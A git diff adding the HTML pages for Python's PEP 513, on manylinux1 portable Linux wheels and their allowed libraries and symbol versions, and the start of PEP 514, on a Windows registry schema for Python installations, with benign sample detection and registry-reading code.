Most desktop and server linux distributions come with a system package manager +(examples include APT on Debian-based systems, yum on +RPM-based systems, and pacman on Arch linux) that manages, among other +responsibilities, the installation of shared libraries installed to system +directories such as /usr/lib. Most non-trivial Python extensions will depend +on one or more of these shared libraries, and thus function properly only on +systems where the user has the proper libraries (and the proper +versions thereof), either installed using their package manager, or installed +manually by setting certain environment variables such as LD_LIBRARY_PATH +to notify the runtime linker of the location of the depended-upon shared +libraries.

+
+
+

Versioning of Core Shared Libraries

+

Even if the developers a Python extension module wish to use no +external shared libraries, the modules will generally have a dynamic runtime +dependency on the GNU C library, glibc. While it is possible, statically +linking glibc is usually a bad idea because certain important C functions +like dlopen() cannot be called from code that statically links glibc. A +runtime shared library dependency on a system-provided glibc is unavoidable +in practice.

+

The maintainers of the GNU C library follow a strict symbol versioning scheme +for backward compatibility. This ensures that binaries compiled against an older +version of glibc can run on systems that have a newer glibc. The +opposite is generally not true – binaries compiled on newer Linux +distributions tend to rely upon versioned functions in glibc that are not +available on older systems.

+

This generally prevents wheels compiled on the latest Linux distributions +from being portable.

+
+
+
+

The manylinux1 policy

+

For these reasons, to achieve broad portability, Python wheels

+
    +
  • should depend only on an extremely limited set of external shared +libraries; and
  • +
  • should depend only on “old” symbol versions in those external shared +libraries; and
  • +
  • should depend only on a widely-compatible kernel ABI.
  • +
+

To be eligible for the manylinux1 platform tag, a Python wheel must +therefore both (a) contain binary executables and compiled code that links +only to libraries with SONAMEs +included in the following list:

+
libpanelw.so.5
+libncursesw.so.5
+libgcc_s.so.1
+libstdc++.so.6
+libm.so.6
+libdl.so.2
+librt.so.1
+libc.so.6
+libnsl.so.1
+libutil.so.1
+libpthread.so.0
+libresolv.so.2
+libX11.so.6
+libXext.so.6
+libXrender.so.1
+libICE.so.6
+libSM.so.6
+libGL.so.1
+libgobject-2.0.so.0
+libgthread-2.0.so.0
+libglib-2.0.so.0
+
+
+

and, (b) work on a stock CentOS 5.11 [6] system that contains the system +package manager’s provided versions of these libraries.

+

libcrypt.so.1 was retrospectively removed from the whitelist after +Fedora 30 was released with libcrypt.so.2 instead.

+

Because CentOS 5 is only available for x86_64 and i686 architectures, +these are the only architectures currently supported by the manylinux1 +policy.

+

On Debian-based systems, these libraries are provided by the packages

+
libncurses5 libgcc1 libstdc++6 libc6 libx11-6 libxext6
+libxrender1 libice6 libsm6 libgl1-mesa-glx libglib2.0-0
+
+
+

On RPM-based systems, these libraries are provided by the packages

+
ncurses libgcc libstdc++ glibc libXext libXrender
+libICE libSM mesa-libGL glib2
+
+
+

This list was compiled by checking the external shared library dependencies of +the Canopy [4] and Anaconda [5] distributions, which both include a wide array +of the most popular Python modules and have been confirmed in practice to work +across a wide swath of Linux systems in the wild.

+

Many of the permitted system libraries listed above use symbol versioning +schemes for backward compatibility. The latest symbol versions provided with +the CentOS 5.11 versions of these libraries are:

+
GLIBC_2.5
+CXXABI_3.4.8
+GLIBCXX_3.4.9
+GCC_4.2.0
+
+
+

Therefore, as a consequence of requirement (b), any wheel that depends on +versioned symbols from the above shared libraries may depend only on symbols +with the following versions:

+
GLIBC <= 2.5
+CXXABI <= 3.4.8
+GLIBCXX <= 3.4.9
+GCC <= 4.2.0
+
+
+

These recommendations are the outcome of the relevant discussions in January +2016 [7], [8].

+

Note that in our recommendations below, we do not suggest that pip +or PyPI should attempt to check for and enforce the details of this +policy (just as they don’t check for and enforce the details of +existing platform tags like win32). The text above is provided (a) +as advice to package builders, and (b) as a method for allocating +blame if a given wheel doesn’t work on some system: if it satisfies +the policy above, then this is a bug in the spec or the installation +tool; if it does not satisfy the policy above, then it’s a bug in the +wheel. One useful consequence of this approach is that it leaves open +the possibility of further updates and tweaks as we gain more +experience, e.g., we could have a “manylinux 1.1” policy which targets +the same systems and uses the same manylinux1 platform tag (and +thus requires no further changes to pip or PyPI), but that adjusts +the list above to remove libraries that have turned out to be +problematic or add libraries that have turned out to be safe.

+
+

libpythonX.Y.so.1

+

Note that libpythonX.Y.so.1 is not on the list of libraries that +a manylinux1 extension is allowed to link to. Explicitly linking +to libpythonX.Y.so.1 is unnecessary in almost all cases: the way +ELF linking works, extension modules that are loaded into the +interpreter automatically get access to all of the interpreter’s +symbols, regardless of whether or not the extension itself is +explicitly linked against libpython. Furthermore, explicit linking to +libpython creates problems in the common configuration where Python is +not built with --enable-shared. In particular, on Debian and +Ubuntu systems, apt install pythonX.Y does not even install +libpythonX.Y.so.1, meaning that any wheel that did depend on +libpythonX.Y.so.1 could fail to import.

+

There is one situation where extensions that are linked in this way +can fail to work: if a host program (e.g., apache2) uses +dlopen() to load a module (e.g., mod_wsgi) that embeds the +CPython interpreter, and the host program does not pass the +RTLD_GLOBAL flag to dlopen(), then the embedded CPython will +be unable to load any extension modules that do not themselves link +explicitly to libpythonX.Y.so.1. Fortunately, apache2 does +set the RTLD_GLOBAL flag, as do all the other programs that +embed-CPython-via-a-dlopened-plugin that we could locate, so this does +not seem to be a serious problem in practice. The incompatibility with +Debian/Ubuntu is more of an issue than the theoretical incompatibility +with a rather obscure corner case.

+

This is a rather complex and subtle issue that extends beyond +the scope of manylinux1; for more discussion see: [9], [10], +[11].

+
+
+

UCS-2 vs UCS-4 builds

+

All versions of CPython 2.x, plus CPython 3.0-3.2 inclusive, can be +built in two ABI-incompatible modes: builds using the +--enable-unicode=ucs2 configure flag store Unicode data in UCS-2 +(or really UTF-16) format, while builds using the +--enable-unicode=ucs4 configure flag store Unicode data in +UCS-4. (CPython 3.3 and greater use a different storage method that +always supports UCS-4.) If we want to make sure ucs2 wheels don’t +get installed into ucs4 CPythons and vice-versa, then something +must be done.

+

An earlier version of this PEP included a requirement that +manylinux1 wheels targeting these older CPython versions should +always use the ucs4 ABI. But then, in between the PEP’s initial +acceptance and its implementation, pip and wheel gained +first-class support for tracking and checking this aspect of ABI +compatibility for the relevant CPython versions, which is a better +solution. So we now allow the manylinux1 platform tags to be used +in combination with any ABI tag. However, to maintain compatibility it +is crucial to ensure that all manylinux1 wheels include a +non-trivial abi tag. For example, a wheel built against a ucs4 +CPython might have a name like:

+
PKG-VERSION-cp27-cp27mu-manylinux1_x86_64.whl
+                 ^^^^^^ Good!
+
+
+

While a wheel built against the ucs2 ABI might have a name like:

+
PKG-VERSION-cp27-cp27m-manylinux1_x86_64.whl
+                 ^^^^^ Okay!
+
+
+

But you should never have a wheel with a name like:

+
PKG-VERSION-cp27-none-manylinux1_x86_64.whl
+                 ^^^^ BAD! Don't do this!
+
+
+

This wheel claims to be simultaneously compatible with both ucs2 and +ucs4 builds, which is bad.

+

We note for information that the ucs4 ABI appears to be much more +widespread among Linux CPython distributors.

+
+
+

fpectl builds vs. no fpectl builds

+

All extant versions of CPython can be built either with or without the +--with-fpectl flag to configure. It turns out that this +changes the CPython ABI: extensions that are built against a +no-fpectl CPython are always compatible with yes-fpectl +CPython, but the reverse is not necessarily true. (Symptom: errors at +import time complaining about undefined symbol: PyFPE_jbuf.) See: +[16].

+

For maximum compatibility, therefore, the CPython used to build +manylinux1 wheels must be compiled without the --with-fpectl +flag, and manylinux1 extensions must not reference the symbol +PyFPE_jbuf.

+
+
+
+

Compilation of Compliant Wheels

+

The way glibc, libgcc, and libstdc++ manage their symbol versioning +means that in practice, the compiler toolchains that most developers +use to do their daily work are incapable of building +manylinux1-compliant wheels. Therefore, we do not attempt to change +the default behavior of pip wheel / bdist_wheel: they will +continue to generate regular linux_* platform tags, and developers +who wish to use them to generate manylinux1-tagged wheels will +have to change the tag as a second post-processing step.

+

To support the compilation of wheels meeting the manylinux1 standard, we +provide initial drafts of two tools.

+
+

Docker Image

+

The first tool is a Docker image based on CentOS 5.11, which is recommended as +an easy to use self-contained build box for compiling manylinux1 wheels +[12]. Compiling on a more recently-released linux distribution will generally +introduce dependencies on too-new versioned symbols. The image comes with a +full compiler suite installed (gcc, g++, and gfortran 4.8.2) as +well as the latest releases of Python and pip.

+
+
+

Auditwheel

+

The second tool is a command line executable called auditwheel [13] that +may aid in package maintainers in dealing with third-party external +dependencies.

+

There are at least three methods for building wheels that use third-party +external libraries in a way that meets the above policy.

+
    +
  1. The third-party libraries can be statically linked.
  2. +
  3. The third-party shared libraries can be distributed in +separate packages on PyPI which are depended upon by the wheel.
  4. +
  5. The third-party shared libraries can be bundled inside the wheel +libraries, linked with a relative path.
  6. +
+

All of these are valid option which may be effectively used by different +packages and communities. Statically linking generally requires +package-specific modifications to the build system, and distributing +third-party dependencies on PyPI may require some coordination of the +community of users of the package.

+

As an often-automatic alternative to these options, we introduce auditwheel. +The tool inspects all of the ELF files inside a wheel to check for +dependencies on versioned symbols or external shared libraries, and verifies +conformance with the manylinux1 policy. This includes the ability to add +the new platform tag to conforming wheels. More importantly, auditwheel has +the ability to automatically modify wheels that depend on external shared +libraries by copying those shared libraries from the system into the wheel +itself, and modifying the appropriate RPATH entries such that these +libraries will be picked up at runtime. This accomplishes a similar result as +if the libraries had been statically linked without requiring changes to the +build system. Packagers are advised that bundling, like static linking, may +implicate copyright concerns.

+
+
+
+

Bundled Wheels on Linux

+

While we acknowledge many approaches for dealing with third-party library +dependencies within manylinux1 wheels, we recognize that the manylinux1 +policy encourages bundling external dependencies, a practice +which runs counter to the package management policies of many linux +distributions’ system package managers [14], [15]. The primary purpose of +this is cross-distro compatibility. Furthermore, manylinux1 wheels on PyPI +occupy a different niche than the Python packages available through the +system package manager.

+

The decision in this PEP to encourage departure from general Linux distribution +unbundling policies is informed by the following concerns:

+
    +
  1. In these days of automated continuous integration and deployment +pipelines, publishing new versions and updating dependencies is easier +than it was when those policies were defined.
  2. +
  3. pip users remain free to use the "--no-binary" option if they want +to force local builds rather than using pre-built wheel files.
  4. +
  5. The popularity of modern container based deployment and “immutable +infrastructure” models involve substantial bundling at the application +layer anyway.
  6. +
  7. Distribution of bundled wheels through PyPI is currently the norm for +Windows and OS X.
  8. +
  9. This PEP doesn’t rule out the idea of offering more targeted binaries for +particular Linux distributions in the future.
  10. +
+

The model described in this PEP is most ideally suited for cross-platform +Python packages, because it means they can reuse much of the +work that they’re already doing to make static Windows and OS X wheels. We +recognize that it is less optimal for Linux-specific packages that might +prefer to interact more closely with Linux’s unique package management +functionality and only care about targeting a small set of particular distos.

+
+

Security Implications

+

One of the advantages of dependencies on centralized libraries in Linux is +that bugfixes and security updates can be deployed system-wide, and +applications which depend on these libraries will automatically feel the +effects of these patches when the underlying libraries are updated. This can +be particularly important for security updates in packages engaged in +communication across the network or cryptography.

+

manylinux1 wheels distributed through PyPI that bundle security-critical +libraries like OpenSSL will thus assume responsibility for prompt updates in +response disclosed vulnerabilities and patches. This closely parallels the +security implications of the distribution of binary wheels on Windows that, +because the platform lacks a system package manager, generally bundle their +dependencies. In particular, because it lacks a stable ABI, OpenSSL cannot be +included in the manylinux1 profile.

+
+
+
+

Platform Detection for Installers

+

Above, we defined what it means for a wheel to be +manylinux1-compatible. Here we discuss what it means for a Python +installation to be manylinux1-compatible. In particular, this is +important for tools like pip to know when deciding whether or not +they should consider manylinux1-tagged wheels for installation.

+

Because the manylinux1 profile is already known to work for the +many thousands of users of popular commercial Python distributions, we +suggest that installation tools should error on the side of assuming +that a system is compatible, unless there is specific reason to +think otherwise.

+

We know of four main sources of potential incompatibility that are +likely to arise in practice:

+
    +
  • Eventually, in the future, there may exist distributions that break +compatibility with this profile (e.g., if one of the libraries in +the profile changes its ABI in a backwards-incompatible way)
  • +
  • A linux distribution that is too old (e.g. RHEL 4)
  • +
  • A linux distribution that does not use glibc (e.g. Alpine Linux, which is +based on musl libc, or Android)
  • +
+

To address these we propose a two-pronged +approach. To handle potential future incompatibilities, we standardize +a mechanism for a Python distributor to signal that a particular +Python install definitely is or is not compatible with manylinux1: +this is done by installing a module named _manylinux, and setting +its manylinux1_compatible attribute. We do not propose adding any +such module to the standard library – this is merely a well-known +name by which distributors and installation tools can +rendezvous. However, if a distributor does add this module, they +should add it to the standard library rather than to a +site-packages/ directory, because the standard library is +inherited by virtualenvs (which we want), and site-packages/ in +general is not.

+

Then, to handle the last two cases for existing Python +distributions, we suggest a simple and reliable method to check for +the presence and version of glibc (basically using it as a “clock” +for the overall age of the distribution).

+

Specifically, the algorithm we propose is:

+
def is_manylinux1_compatible():
+    # Only Linux, and only x86-64 / i686
+    from distutils.util import get_platform
+    if get_platform() not in ["linux-x86_64", "linux-i686"]:
+        return False
+
+    # Check for presence of _manylinux module
+    try:
+        import _manylinux
+        return bool(_manylinux.manylinux1_compatible)
+    except (ImportError, AttributeError):
+        # Fall through to heuristic check below
+        pass
+
+    # Check glibc version. CentOS 5 uses glibc 2.5.
+    return have_compatible_glibc(2, 5)
+
+def have_compatible_glibc(major, minimum_minor):
+    import ctypes
+
+    process_namespace = ctypes.CDLL(None)
+    try:
+        gnu_get_libc_version = process_namespace.gnu_get_libc_version
+    except AttributeError:
+        # Symbol doesn't exist -> therefore, we are not linked to
+        # glibc.
+        return False
+
+    # Call gnu_get_libc_version, which returns a string like "2.5".
+    gnu_get_libc_version.restype = ctypes.c_char_p
+    version_str = gnu_get_libc_version()
+    # py2 / py3 compatibility:
+    if not isinstance(version_str, str):
+        version_str = version_str.decode("ascii")
+
+    # Parse string and check against requested version.
+    version = [int(piece) for piece in version_str.split(".")]
+    assert len(version) == 2
+    if major != version[0]:
+        return False
+    if minimum_minor > version[1]:
+        return False
+    return True
+
+
+

Rejected alternatives: We also considered using a configuration +file, e.g. /etc/python/compatibility.cfg. The problem with this is +that a single filesystem might contain many different interpreter +environments, each with their own ABI profile – the manylinux1 +compatibility of a system-installed x86_64 CPython might not tell us +much about the manylinux1 compatibility of a user-installed i686 +PyPy. Locating this configuration information within the Python +environment itself ensures that it remains attached to the correct +binary, and dramatically simplifies lookup code.

+

We also considered using a more elaborate structure, like a list of +all platform tags that should be considered compatible, together with +their preference ordering, for example: _binary_compat.compatible = +["manylinux1_x86_64", "centos5_x86_64", "linux_x86_64"]. However, +this introduces several complications. For example, we want to be able +to distinguish between the state of “doesn’t support manylinux1” +(or eventually manylinux2, etc.) versus “doesn’t specify either +way whether it supports manylinux1”, which is not entirely obvious +in the above representation; and, it’s not at all clear what features +are really needed vis a vis preference ordering given that right now +the only possible platform tags are manylinux1 and linux. So +we’re deferring a more complete solution here for a separate PEP, when +/ if Linux gets more platform tags.

+

For the library compatibility check, we also considered much more +elaborate checks (e.g. checking the kernel version, searching for and +checking the versions of all the individual libraries listed in the +manylinux1 profile, etc.), but ultimately decided that this would +be more likely to introduce confusing bugs than actually help the +user. (For example: different distributions vary in where they +actually put these libraries, and if our checking code failed to use +the correct path search then it could easily return incorrect +answers.)

+
+
+

PyPI Support

+

PyPI should permit wheels containing the manylinux1 platform tag to be +uploaded. PyPI should not attempt to formally verify that wheels containing +the manylinux1 platform tag adhere to the manylinux1 policy described +in this document. This verification tasks should be left to other tools, like +auditwheel, that are developed separately.

+
+
+

Rejected Alternatives

+

One alternative would be to provide separate platform tags for each Linux +distribution (and each version thereof), e.g. RHEL6, ubuntu14_10, +debian_jessie, etc. Nothing in this proposal rules out the possibility of +adding such platform tags in the future, or of further extensions to wheel +metadata that would allow wheels to declare dependencies on external +system-installed packages. However, such extensions would require substantially +more work than this proposal, and still might not be appreciated by package +developers who would prefer not to have to maintain multiple build environments +and build multiple wheels in order to cover all the common Linux distributions. +Therefore, we consider such proposals to be out-of-scope for this PEP.

+
+
+

Future updates

+

We anticipate that at some point in the future there will be a +manylinux2 specifying a more modern baseline environment (perhaps +based on CentOS 6), and someday a manylinux3 and so forth, but we +defer specifying these until we have more experience with the initial +manylinux1 proposal.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0513.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0514/index.html b/pep-0514/index.html new file mode 100644 index 00000000000..161ccb3f076 --- /dev/null +++ b/pep-0514/index.html @@ -0,0 +1,584 @@ + + + + + + + + PEP 514 – Python registration in the Windows registry | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 514 – Python registration in the Windows registry

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Active
+
Type:
+
Informational
+
Created:
+
02-Feb-2016
+
Post-History:
+
02-Feb-2016, 01-Mar-2016, 18-Jul-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP defines a schema for the Python registry key to allow third-party +installers to register their installation, and to allow tools and applications +to detect and correctly display all Python environments on a user’s machine. No +implementation changes to Python are proposed with this PEP.

+

Python environments are not required to be registered unless they want to be +automatically discoverable by external tools. As this relates to Windows only, +these tools are expected to be predominantly GUI applications. However, console +applications may also make use of the registered information. This PEP covers +the information that may be made available, but the actual presentation and use +of this information is left to the tool designers.

+

The schema matches the registry values that have been used by the official +installer since at least Python 2.5, and the resolution behaviour matches the +behaviour of the official Python releases. Some backwards compatibility rules +are provided to ensure tools can correctly detect versions of CPython that do +not register full information.

+
+
+

Motivation

+

When installed on Windows, the official Python installer creates a registry key +for discovery and detection by other applications. This allows tools such as +installers or IDEs to automatically detect and display a user’s Python +installations. For example, the PEP 397 py.exe launcher and editors such as +PyCharm and Visual Studio already make use of this information.

+

Third-party installers, such as those used by distributions, typically create +identical keys for the same purpose. Most tools that use the registry to detect +Python installations only inspect the keys used by the official installer. As a +result, third-party installations that wish to be discoverable will overwrite +these values, often causing users to “lose” their original Python installation.

+

By describing a layout for registry keys that allows third-party installations +to register themselves uniquely, as well as providing tool developers guidance +for discovering all available Python installations, these collisions should be +prevented. We also take the opportunity to add some well-known metadata so that +more information can be presented to users.

+
+
+

Definitions

+

A “registry key” is the equivalent of a file-system path into the registry. Each +key may contain “subkeys” (keys nested within keys) and “values” (named and +typed attributes attached to a key). These are used on Windows to store settings +in much the same way that directories containing configuration files would work.

+

HKEY_CURRENT_USER is the root of settings for the currently logged-in user, +and this user can generally read and write all settings under this root.

+

HKEY_LOCAL_MACHINE is the root of settings for all users. Generally, any +user can read these settings but only administrators can modify them. It is +typical for values under HKEY_CURRENT_USER to take precedence over those in +HKEY_LOCAL_MACHINE.

+

On 64-bit Windows, HKEY_LOCAL_MACHINE\Software\Wow6432Node is a special key +that 32-bit processes transparently read and write to rather than accessing the +Software key directly.

+

Further documentation regarding registry redirection on Windows is available +from the MSDN Library [1].

+
+
+

Structure

+

We consider there to be a single collection of Python environments on a machine, +where the collection may be different for each user of the machine. There are +three potential registry locations where the collection may be stored based on +the installation options of each environment:

+
HKEY_CURRENT_USER\Software\Python\<Company>\<Tag>
+HKEY_LOCAL_MACHINE\Software\Python\<Company>\<Tag>
+HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python\<Company>\<Tag>
+
+
+

Official Python releases use PythonCore for Company, and the value of +sys.winver for Tag. The Company PyLauncher is reserved. Other registered +environments may use any values for Company and Tag. Recommendations are made +later in this document.

+

Company-Tag pairs are case-insensitive, and uniquely identify each environment. +Depending on the purpose and intended use of a tool, there are two suggested +approaches for resolving conflicts between Company-Tag pairs.

+

Tools that list every installed environment may choose to include those +even where the Company-Tag pairs match. They should ensure users can easily +identify whether the registration was per-user or per-machine, and which +registration has the higher priority.

+

Tools that aim to select a single installed environment from all registered +environments based on the Company-Tag pair, such as the py.exe launcher, +should always select the environment registered in HKEY_CURRENT_USER when +than the matching one in HKEY_LOCAL_MACHINE.

+

Conflicts between HKEY_LOCAL_MACHINE\Software\Python and +HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python should only occur when both +64-bit and 32-bit versions of an interpreter have the same Tag. In this case, +the tool should select whichever is more appropriate for its use.

+

If a tool is able to determine from the provided information (or lack thereof) +that it cannot use a registered environment, there is no obligation to present +it to users.

+

Except as discussed in the section on backwards compatibility, Company and Tag +values are considered opaque to tools, and no information about the interpreter +should be inferred from the text. However, some tools may display the Company +and Tag values to users, so ideally the Tag will be able to help users identify +the associated environment.

+

Python environments are not required to register themselves unless they want to +be automatically discoverable by external tools.

+
+

Backwards Compatibility

+

Python 3.4 and earlier did not distinguish between 32-bit and 64-bit builds in +sys.winver. As a result, it is not possible to have valid side-by-side +installations of both 32-bit and 64-bit interpreters under this scheme since it +would result in duplicate Tags.

+

To ensure backwards compatibility, applications should treat environments listed +under the following two registry keys as distinct, even when the Tag matches:

+
HKEY_LOCAL_MACHINE\Software\Python\PythonCore\<Tag>
+HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python\PythonCore\<Tag>
+
+
+

Environments listed under HKEY_CURRENT_USER may be treated as distinct from +both of the above keys, potentially resulting in three environments discovered +using the same Tag. Alternatively, a tool may determine whether the per-user +environment is 64-bit or 32-bit and give it priority over the per-machine +environment, resulting in a maximum of two discovered environments.

+

It is not possible to detect side-by-side installations of both 64-bit and +32-bit versions of Python prior to 3.5 when they have been installed for the +current user. Python 3.5 and later always uses different Tags for 64-bit and +32-bit versions.

+

The following section describe user-visible information that may be registered. +For Python 3.5 and earlier, none of this information is available, but +alternative defaults are specified for the PythonCore key.

+

Environments registered under other Company names have no backward compatibility +requirements and must use distinct Tags to support side-by-side installations. +Tools consuming these registrations are not required to disambiguate tags other +than by preferring the user’s setting.

+
+
+

Company

+

The Company part of the key is intended to group related environments and to +ensure that Tags are namespaced appropriately. The key name should be +alphanumeric without spaces and likely to be unique. For example, a trademarked +name (preferred), a hostname, or as a last resort, a UUID would be appropriate:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp
+HKEY_CURRENT_USER\Software\Python\www.example.com
+HKEY_CURRENT_USER\Software\Python\6C465E66-5A8C-4942-9E6A-D29159480C60
+
+
+

The company name PyLauncher is reserved for the PEP 397 launcher +(py.exe). It does not follow this convention and should be ignored by tools.

+

If a string value named DisplayName exists, it should be used to identify +the environment manufacturer/developer/distributor to users. Otherwise, the name +of the key should be used. (For PythonCore, the default display name is +“Python Software Foundation”.)

+

If a string value named SupportUrl exists, it may be displayed or otherwise +used to direct users to a web site related to the environment. (For +PythonCore, the default support URL is “http://www.python.org/”.)

+

A complete example may look like:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp
+    (Default) = (value not set)
+    DisplayName = "Example Corp"
+    SupportUrl = "http://www.example.com"
+
+
+
+
+

Tag

+

The Tag part of the key is intended to uniquely identify an environment within +those provided by a single company. The key name should be alphanumeric without +spaces and stable across installations. For example, the Python language +version, a UUID or a partial/complete hash would be appropriate, while a Tag +based on the install directory or some aspect of the current machine may not. +For example:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\examplepy
+HKEY_CURRENT_USER\Software\Python\ExampleCorp\3.6
+HKEY_CURRENT_USER\Software\Python\ExampleCorp\6C465E66
+
+
+

It is expected that some tools will require users to type the Tag into a command +line, and that the Company may be optional provided the Tag is unique across all +Python installations. Short, human-readable and easy to type Tags are +recommended, and if possible, select a value likely to be unique across all +other Companies.

+

If a string value named DisplayName exists, it should be used to identify +the environment to users. Otherwise, the name of the key should be used. (For +PythonCore, the default is “Python “ followed by the Tag.)

+

If a string value named SupportUrl exists, it may be displayed or otherwise +used to direct users to a web site related to the environment. (For +PythonCore, the default is “http://www.python.org/”.)

+

If a string value named Version exists, it should be used to identify the +version of the environment. This is independent from the version of Python +implemented by the environment. (For PythonCore, the default is the first +three characters of the Tag.)

+

If a string value named SysVersion exists, it must be in x.y or +x.y.z format matching the version returned by sys.version_info in the +interpreter. If omitted, the Python version is unknown. (For PythonCore, +the default is the first three characters of the Tag.)

+

If a string value named SysArchitecture exists, it must match the first +element of the tuple returned by platform.architecture(). Typically, this +will be “32bit” or “64bit”. If omitted, the architecture is unknown. (For +PythonCore, the architecture is “32bit” when registered under +HKEY_LOCAL_MACHINE\Software\Wow6432Node\Python or anywhere on a 32-bit +operating system, “64bit” when registered under +HKEY_LOCAL_MACHINE\Software\Python on a 64-bit machine, and unknown when +registered under HKEY_CURRENT_USER.)

+

Note that each of these values is recommended, but optional. Omitting +SysVersion or SysArchitecture may prevent some tools from correctly +supporting the environment. A complete example may look like this:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\examplepy
+    (Default) = (value not set)
+    DisplayName = "Example Py Distro 3"
+    SupportUrl = "http://www.example.com/distro-3"
+    Version = "3.0.12345.0"
+    SysVersion = "3.6.0"
+    SysArchitecture = "64bit"
+
+
+
+
+

InstallPath

+

Beneath the environment key, an InstallPath key must be created. This key is +always named InstallPath, and the default value must match sys.prefix:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\3.6\InstallPath
+    (Default) = "C:\ExampleCorpPy36"
+
+
+

If a string value named ExecutablePath exists, it must be the full path to +the python.exe (or equivalent) executable. If omitted, the environment is +not executable. (For PythonCore, the default is the python.exe file in +the directory referenced by the (Default) value.)

+

If a string value named ExecutableArguments exists, tools should use the +value as the first arguments when executing ExecutablePath. Tools may add +other arguments following these, and will reasonably expect standard Python +command line options to be available.

+

If a string value named WindowedExecutablePath exists, it must be a path to +the pythonw.exe (or equivalent) executable. If omitted, the default is the +value of ExecutablePath, and if that is omitted the environment is not +executable. (For PythonCore, the default is the pythonw.exe file in the +directory referenced by the (Default) value.)

+

If a string value named WindowedExecutableArguments exists, tools should use +the value as the first arguments when executing WindowedExecutablePath. +Tools may add other arguments following these, and will reasonably expect +standard Python command line options to be available.

+

A complete example may look like:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\examplepy\InstallPath
+    (Default) = "C:\ExampleDistro30"
+    ExecutablePath = "C:\ExampleDistro30\ex_python.exe"
+    ExecutableArguments = "--arg1"
+    WindowedExecutablePath = "C:\ExampleDistro30\ex_pythonw.exe"
+    WindowedExecutableArguments = "--arg1"
+
+
+
+
+

Help

+

Beneath the environment key, a Help key may be created. This key is always +named Help if present and has no default value.

+

Each subkey of Help specifies a documentation file, tool, or URL associated +with the environment. The subkey may have any name, and the default value is a +string appropriate for passing to os.startfile or equivalent.

+

If a string value named DisplayName exists, it should be used to identify +the help file to users. Otherwise, the key name should be used.

+

A complete example may look like:

+
HKEY_CURRENT_USER\Software\Python\ExampleCorp\6C465E66\Help
+    Python\
+        (Default) = "C:\ExampleDistro30\python36.chm"
+        DisplayName = "Python Documentation"
+    Extras\
+        (Default) = "http://www.example.com/tutorial"
+        DisplayName = "Example Distro Online Tutorial"
+
+
+
+
+

Other Keys

+

All other subkeys under a Company-Tag pair are available for private use.

+

Official CPython releases have traditionally used certain keys in this space to +determine the location of the Python standard library and other installed +modules. This behaviour is retained primarily for backward compatibility. +However, as the code that reads these values is embedded into the interpreter, +third-party distributions may be affected by values written into PythonCore +if using an unmodified interpreter.

+
+
+
+

Sample Code

+

This sample code enumerates the registry and displays the available Company-Tag +pairs that could be used to launch an environment and the target executable. It +only shows the most-preferred target for the tag. Backwards-compatible handling +of PythonCore is omitted but shown in a later example:

+
# Display most-preferred environments.
+# Assumes a 64-bit operating system
+# Does not correctly handle PythonCore compatibility
+
+import winreg
+
+def enum_keys(key):
+    i = 0
+    while True:
+        try:
+            yield winreg.EnumKey(key, i)
+        except OSError:
+            break
+        i += 1
+
+def get_value(key, value_name):
+    try:
+        return winreg.QueryValue(key, value_name)
+    except FileNotFoundError:
+        return None
+
+seen = set()
+for hive, key, flags in [
+    (winreg.HKEY_CURRENT_USER, r'Software\Python', 0),
+    (winreg.HKEY_LOCAL_MACHINE, r'Software\Python', winreg.KEY_WOW64_64KEY),
+    (winreg.HKEY_LOCAL_MACHINE, r'Software\Python', winreg.KEY_WOW64_32KEY),
+]:
+    with winreg.OpenKeyEx(hive, key, access=winreg.KEY_READ | flags) as root_key:
+        for company in enum_keys(root_key):
+            if company == 'PyLauncher':
+                continue
+
+            with winreg.OpenKey(root_key, company) as company_key:
+                for tag in enum_keys(company_key):
+                    if (company, tag) in seen:
+                        if company == 'PythonCore':
+                            # TODO: Backwards compatibility handling
+                            pass
+                        continue
+                    seen.add((company, tag))
+
+                    try:
+                        with winreg.OpenKey(company_key, tag + r'\InstallPath') as ip_key:
+                            exec_path = get_value(ip_key, 'ExecutablePath')
+                            exec_args = get_value(ip_key, 'ExecutableArguments')
+                            if company == 'PythonCore' and not exec_path:
+                                # TODO: Backwards compatibility handling
+                                pass
+                    except OSError:
+                        exec_path, exec_args = None, None
+
+                    if exec_path:
+                        print('{}\\{} - {} {}'.format(company, tag, exec_path, exec_args or ''))
+                    else:
+                        print('{}\\{} - (not executable)'.format(company, tag))
+
+
+

This example only scans PythonCore entries for the current user. Where data +is missing, the defaults as described earlier in the PEP are substituted. Note +that these defaults are only for use under PythonCore; other registrations +do not have any default values:

+
# Only lists per-user PythonCore registrations
+# Uses fallback values as described in PEP 514
+
+import os
+import winreg
+
+def enum_keys(key):
+    i = 0
+    while True:
+        try:
+            yield winreg.EnumKey(key, i)
+        except OSError:
+            break
+        i += 1
+
+def get_value(key, value_name):
+    try:
+        return winreg.QueryValue(key, value_name)
+    except FileNotFoundError:
+        return None
+
+with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Python\PythonCore") as company_key:
+    print('Company:', get_value(company_key, 'DisplayName') or 'Python Software Foundation')
+    print('Support:', get_value(company_key, 'SupportUrl') or 'http://www.python.org/')
+    print()
+
+    for tag in enum_keys(company_key):
+        with winreg.OpenKey(company_key, tag) as tag_key:
+            print('PythonCore\\' + tag)
+            print('Name:', get_value(tag_key, 'DisplayName') or ('Python ' + tag))
+            print('Support:', get_value(tag_key, 'SupportUrl') or 'http://www.python.org/')
+            print('Version:', get_value(tag_key, 'Version') or tag[:3])
